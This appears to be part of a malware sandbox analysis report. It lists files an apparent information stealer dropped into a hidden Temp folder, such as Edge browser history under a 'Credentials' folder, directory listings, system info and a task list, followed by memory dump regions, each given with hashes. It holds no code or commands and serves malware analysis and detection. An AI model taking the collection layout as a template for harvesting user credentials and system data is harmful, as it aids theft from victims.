b792b40a16563f95c7c0acd97e04822a063c092dd605cb3c464776c378a17232d6ee0edb7e1c07d6d9fd801cef6068d27d5cc1c2793b6ce0ba99ce226317a9ef

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Common Files\Pictures\My Wallpaper.jpg

Filesize
24KB

MD5
a51464e41d75b2aa2b00ca31ea2ce7eb

SHA1
5b94362ac6a23c5aba706e8bfd11a5d8bab6097d

SHA256
16d5506b6663085b1acd80644ffa5363c158e390da67ed31298b85ddf0ad353f

SHA512
b2a09d52c211e7100e3e68d88c13394c64f23bf2ec3ca25b109ffb1e1a96a054f0e0d25d2f2a0c2145616eabc88c51d63023cef5faa7b49129d020f67ab0b1ff

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Common Files\Pictures\RegisterSync.jpg

Filesize
149KB

MD5
7d51c90a3df3b6c799154a926602285a

SHA1
a6828b4f8d83cc355d2f24c454ace90383e667df

SHA256
73ac21a8ddeab849394654f55fff34688fe1b08992608a298ff9f0faeb37fb3d

SHA512
dca8decb4fe8104e69885bc23f505f0fdcbe526647bd1be125a8620a50233ede80c7441efae6f225311f4d6a82b4db339e51ca4bab77e7dc8f59143b669fb9e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Common Files\Pictures\RemoveJoin.jpg

Filesize
136KB

MD5
10728cb4f1437f29051a2cf5f1eabd91

SHA1
43f87d2e659a142433606885bb37d0f5bb73ffd2

SHA256
75576cc401ac8f0b552005dce6d7effee2743fd5d57bd82478cd8c010faa211b

SHA512
af43db3172f678c090cdffdc6fadb285045ac47f0eb2145780f50ceb7e6520a9c7be0c9c98467f21a5a4612e91cf2efa840c217da0c4f62a7da3a88d5571ac64

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Common Files\Pictures\RepairRestore.png

Filesize
129KB

MD5
45e38cd49b4f946245e123bd77859c17

SHA1
cf14479867276a1d40a9f89a0851bbac4c76ae09

SHA256
a2e3e0441e4244d2a8e79fa56eb9807771bf641861d73aa460c49ef67f15f0f5

SHA512
972f8da72d6e22bf53aad61aa7d74367c2edca0ee920e3f7a2b328935d3273731c045e636041bc2314fc1208c5be01e2a8208acb94d16d67f492cdf2057dc85a

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Common Files\Pictures\RevokeInstall.png

Filesize
159KB

MD5
c35fd170b8d2fb3233e655d2414bf553

SHA1
be0f08745c5fa65b3b635eb7df79a09f256546f1

SHA256
8b40af191ea3df34d8c4ed9e9d55459ed171fae1ae9712c5eb922d41f5949d2a

SHA512
2820adc24e48638d4de2bfd2a0d9446e8eeb5d25b6a588d00b686fc9037f969d09ac7ae00efe0159b8e128a848f7f9b8a42e3074b75dfa3d8b41b9d68c98018f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Common Files\Pictures\SelectBackup.dxf

Filesize
85KB

MD5
6a859cb649db4cf933cb7e01e21b5f06

SHA1
9a486f3edb5e34dec065a87ee920c6fdcd13a37c

SHA256
bc02db39ac4b3c05e881f9d126775a50b9ffdea14e0fdbaf4d9fc5f2f69f20ca

SHA512
6d3b8ca06fbaf1cc7049fd0a48a2476fd53825762ddc45a6e071102e8a9bb5412736be01bda636ca1c60b60d20908cfd1bab8be12e6e38178a06281d6e118bed

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Credentials\Edge\Edge History.txt

Filesize
570B

MD5
c8f1e5394e925e7d20d89f08d6fc0ea3

SHA1
48315b570433361eeeb78f54da0a7f0b1613e20c

SHA256
09cf3f2241ac379558f93199e6c7a15b85dd10351da9c96adbda8341fc8b78fe

SHA512
5b0d18263eb686a1cf425c9c12420c701a6ac13bd71f8631b6cfeef2dc49db3b3e1cc17132383531c7fc79c0484db35aaf8ae18196a5fbaad712dd867df63f90

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Directories\Desktop.txt

Filesize
652B

MD5
35ae7178c3e3c99f0e5f086d06857d6f

SHA1
345378bc497ea0bc1d6a03dd878464940d072570

SHA256
8f64fe1ac73184152716862fddbed45adbeda3621db92b3f38d8a5b16b6931f8

SHA512
babdb7324d17898177fa8c39cc295057b392e5c60ec19a5345c811e6ba7cca9b7cdce08bb40c79d2f59498dfc9fb92aed581c4db45ac8fb2a76c2dc9086b5b08

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Directories\Documents.txt

Filesize
950B

MD5
095851c94522b48e879e903c6fe955ef

SHA1
00f1d8aabdd204dde5388d01273564d613a1dc41

SHA256
90eeacced0005770f07e5914e7241770b3a776048a845a83e5ceeb0208404c49

SHA512
24884a4d8f4d82013908170c2d61a94355d0ba9e8285bdc3f5515aaa2787a569d7a7c37a0c13424aac7c7a602d4bd028fbdc248edcb7cfaf04dd74e164c8adc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Directories\Downloads.txt

Filesize
743B

MD5
9754bea6f8e585905ffc699a7df57eb5

SHA1
e7f15c8fcf376e79182b16fa5c2cea5fb02c909d

SHA256
593dd63acd4eb15875c60c9869288a8400347d073137fb7fef813758b51f2c39

SHA512
2d299d810f1730e32fe99b5666b07a6ab64302411e9cca7fa76e8366823ed97e3c421f7d1d4d047b28da6a49f286def747d3d3a46b994e8341db0639e03d6909

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Directories\Music.txt

Filesize
748B

MD5
53d120ed890d6684d5d834a0685c9b11

SHA1
d9c85d6d171f09bdb40af35ee5c6bab48a1c5723

SHA256
9118e0336e680a9a484a1318c650992003dade4aaf8e6a06258fce40f95341f1

SHA512
b44a739a16d72075d66cbb38b33f4cbadf99510bb3dbb33a64391206019c3ab05c1d0ebe0b35998d467176ec6fb654eef19b8531e473d07b56ac6725b6703529

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Directories\Pictures.txt

Filesize
1010B

MD5
a76296aeff5fdbd9188722624d0e1bc2

SHA1
65e964bc43b647d6a15f8e1b50a45e65d74a28df

SHA256
5ae4150836e60b5b41e0bccd88aa2cf75378d38e44e3167148a2fa048176a9f0

SHA512
f322d4fa51065bc8320b41f54b194752158e3e472df2c1f115400f2b735587a53b7bafc4a45fd69272c2b29e6a809c93bc5fb0db87e9fa3234822bed29469603

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \Directories\Videos.txt

Filesize
30B

MD5
e140e10b2b43ba6f978bee0aa90afaf7

SHA1
bbbeb7097ffa9c2daa3206b3f212d3614749c620

SHA256
c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

SHA512
df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \System\System Info.txt

Filesize
2KB

MD5
9e7a230485e2294bfb63eb5183ef3f69

SHA1
29dda5c0c57b6f8738bc284935b519c29a081068

SHA256
e84d1de9bd8789b75776125fd2ec349438046156d4f8dfe6b9419f3d1995ec11

SHA512
0b96a7f9d8ac8264bf6cc7158d1b4746a8f0f9723ab3a20514368800c647889383d43efbab8daa85731fe8023ab3d31a273e1473b56a92a971fb2ec304a0f43c

Download Submit
C:\Users\Admin\AppData\Local\Temp\ ‏   \System\Task List.txt

Filesize
15KB

MD5
21df2f3f72bcbad66cea05be21a2cb5e

SHA1
4803f0674cde72ab5eb2e5ec984a29f0642e0dc5

SHA256
dc1f215060f7b1b13a0ce1af930be1fe67edb7af9c8c6e2a76334cbb84798a5d

SHA512
117aef073c26f3e0f9de39dfd15e69cc6c550a08f8d05e256c6fb155a2a5893471514f73ff0245d7519e51e3a0dc36cd900ae38d9f9483d4c77f54f7dd22cf96

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 978306.crdownload

Filesize
7.7MB

MD5
173026100e56a1545e765354fe8b81a5

SHA1
4a6fb35ad636ef28a2a2ed1bef55829d2f388f4c

SHA256
9d57c9daed9311194241dae8ff58f4ecaa66dab64e9ffe6f22f567680aa31bab

SHA512
a00b5be60fcdb9d5ec9d1b655cdb40093d4a936e342034aa9963c21aa7837812ff605b7557bcada9d660e3cce047cbcdbdfe7bb3a77742159a77d33e32536d31

Download Submit
memory/4420-381-0x0000000000400000-0x0000000000603000-memory.dmp

Filesize
2.0MB

Download
memory/4420-333-0x0000000000400000-0x0000000000603000-memory.dmp

Filesize
2.0MB

Download
memory/5280-578-0x0000029AEF240000-0x0000029AEF288000-memory.dmp

Filesize
288KB

Download
memory/5620-348-0x0000019B7F590000-0x0000019B7F5B2000-memory.dmp

Filesize
136KB

Download
memory/5792-330-0x00007FFCDB330000-0x00007FFCDB33D000-memory.dmp

Filesize
52KB

Download
memory/5792-325-0x00007FFCDB7A0000-0x00007FFCDB7CE000-memory.dmp

Filesize
184KB

Download
memory/5792-252-0x00007FFCDC7B0000-0x00007FFCDCD99000-memory.dmp

Filesize
5.9MB

Download
memory/5792-317-0x00007FFCDBAC0000-0x00007FFCDBAE3000-memory.dmp

Filesize
140KB

Download
memory/5792-321-0x00007FFCDBB10000-0x00007FFCDBB3D000-memory.dmp

Filesize
180KB

Download
memory/5792-324-0x00007FFCDB7D0000-0x00007FFCDB7DD000-memory.dmp

Filesize
52KB

Download
memory/5792-326-0x00007FFCDB360000-0x00007FFCDB6D8000-memory.dmp

Filesize
3.5MB

Download
memory/5792-270-0x00007FFCE9250000-0x00007FFCE925F000-memory.dmp

Filesize
60KB

Download
memory/5792-269-0x00007FFCDDA50000-0x00007FFCDDA73000-memory.dmp

Filesize
140KB

Download
memory/5792-268-0x00007FFCEE020000-0x00007FFCEE030000-memory.dmp

Filesize
64KB

Download
memory/5792-328-0x00007FFCDB6E0000-0x00007FFCDB798000-memory.dmp

Filesize
736KB

Download
memory/5792-331-0x00007FFCDC7B0000-0x00007FFCDCD99000-memory.dmp

Filesize
5.9MB

Download
memory/5792-329-0x00007FFCDB340000-0x00007FFCDB354000-memory.dmp

Filesize
80KB

Download
memory/5792-327-0x00000124AC120000-0x00000124AC498000-memory.dmp

Filesize
3.5MB

Download
memory/5792-323-0x00007FFCDB7E0000-0x00007FFCDB7F9000-memory.dmp

Filesize
100KB

Download
memory/5792-318-0x00007FFCDB940000-0x00007FFCDBAB7000-memory.dmp

Filesize
1.5MB

Download
memory/5792-316-0x00007FFCDBAF0000-0x00007FFCDBB09000-memory.dmp

Filesize
100KB

Download
memory/5792-386-0x00007FFCEE020000-0x00007FFCEE030000-memory.dmp

Filesize
64KB

Download
memory/5792-387-0x00007FFCDDA50000-0x00007FFCDDA73000-memory.dmp

Filesize
140KB

Download
memory/5792-396-0x00007FFCDB6E0000-0x00007FFCDB798000-memory.dmp

Filesize
736KB

Download
memory/5792-400-0x00007FFCE9250000-0x00007FFCE925F000-memory.dmp

Filesize
60KB

Download
memory/5792-401-0x00007FFCDBB10000-0x00007FFCDBB3D000-memory.dmp

Filesize
180KB

Download
memory/5792-402-0x00007FFCDBAF0000-0x00007FFCDBB09000-memory.dmp

Filesize
100KB

Download
memory/5792-403-0x00007FFCDBAC0000-0x00007FFCDBAE3000-memory.dmp

Filesize
140KB

Download
memory/5792-404-0x00007FFCDB940000-0x00007FFCDBAB7000-memory.dmp

Filesize
1.5MB

Download
memory/5792-405-0x00007FFCDB7E0000-0x00007FFCDB7F9000-memory.dmp

Filesize
100KB

Download
memory/5792-406-0x00007FFCDB7D0000-0x00007FFCDB7DD000-memory.dmp

Filesize
52KB

Download
memory/5792-407-0x00007FFCDB7A0000-0x00007FFCDB7CE000-memory.dmp

Filesize
184KB

Download
memory/5792-408-0x00007FFCDB360000-0x00007FFCDB6D8000-memory.dmp

Filesize
3.5MB

Download
memory/5920-258-0x00007FFCDC1C0000-0x00007FFCDC7A9000-memory.dmp

Filesize
5.9MB

Download
memory/5920-297-0x00007FFCDC190000-0x00007FFCDC1B3000-memory.dmp

Filesize
140KB

Download
memory/5920-313-0x000002B00BB40000-0x000002B00BEB8000-memory.dmp

Filesize
3.5MB

Download
memory/5920-889-0x00007FFCDC190000-0x00007FFCDC1B3000-memory.dmp

Filesize
140KB

Download
memory/5920-890-0x00007FFCDBFB0000-0x00007FFCDC127000-memory.dmp

Filesize
1.5MB

Download
memory/5920-319-0x00007FFCDDE10000-0x00007FFCDDE1D000-memory.dmp

Filesize
52KB

Download
memory/5920-320-0x00007FFCDB800000-0x00007FFCDB91C000-memory.dmp

Filesize
1.1MB

Download
memory/5920-892-0x00007FFCDBF80000-0x00007FFCDBFAE000-memory.dmp

Filesize
184KB

Download
memory/5920-893-0x00007FFCDBEC0000-0x00007FFCDBF78000-memory.dmp

Filesize
736KB

Download
memory/5920-588-0x00007FFCDC1C0000-0x00007FFCDC7A9000-memory.dmp

Filesize
5.9MB

Download
memory/5920-305-0x00007FFCDBF80000-0x00007FFCDBFAE000-memory.dmp

Filesize
184KB

Download
memory/5920-304-0x00007FFCDF2D0000-0x00007FFCDF2DD000-memory.dmp

Filesize
52KB

Download
memory/5920-303-0x00007FFCDDA30000-0x00007FFCDDA49000-memory.dmp

Filesize
100KB

Download
memory/5920-300-0x00007FFCDF1E0000-0x00007FFCDF1F9000-memory.dmp

Filesize
100KB

Download
memory/5920-308-0x00007FFCDBB40000-0x00007FFCDBEB8000-memory.dmp

Filesize
3.5MB

Download
memory/5920-299-0x00007FFCDC160000-0x00007FFCDC18D000-memory.dmp

Filesize
180KB

Download
memory/5920-306-0x00007FFCDBEC0000-0x00007FFCDBF78000-memory.dmp

Filesize
736KB

Download
memory/5920-296-0x00007FFCE6B50000-0x00007FFCE6B60000-memory.dmp

Filesize
64KB

Download
memory/5920-322-0x00007FFCDB920000-0x00007FFCDB934000-memory.dmp

Filesize
80KB

Download
memory/5920-302-0x00007FFCDBFB0000-0x00007FFCDC127000-memory.dmp

Filesize
1.5MB

Download
memory/5920-301-0x00007FFCDC130000-0x00007FFCDC153000-memory.dmp

Filesize
140KB

Download
memory/5920-891-0x00007FFCDDA30000-0x00007FFCDDA49000-memory.dmp

Filesize
100KB

Download
memory/5920-298-0x00007FFCE16F0000-0x00007FFCE16FF000-memory.dmp

Filesize
60KB

Download
memory/5920-871-0x00007FFCDBB40000-0x00007FFCDBEB8000-memory.dmp

Filesize
3.5MB

Download
memory/5920-872-0x000002B00BB40000-0x000002B00BEB8000-memory.dmp

Filesize
3.5MB

Download
memory/5920-873-0x00007FFCDC1C0000-0x00007FFCDC7A9000-memory.dmp

Filesize
5.9MB

Download
memory/6340-538-0x0000017C72D50000-0x0000017C72D58000-memory.dmp

Filesize
32KB

Download
memory/6596-518-0x0000000000F20000-0x0000000000F37000-memory.dmp

Filesize
92KB

Download
memory/6596-521-0x0000000000F20000-0x0000000000F37000-memory.dmp

Filesize
92KB

Download
memory/6596-522-0x0000000074C30000-0x0000000074C69000-memory.dmp

Filesize
228KB

Download
memory/6596-519-0x0000000074C30000-0x0000000074C69000-memory.dmp

Filesize
228KB

Download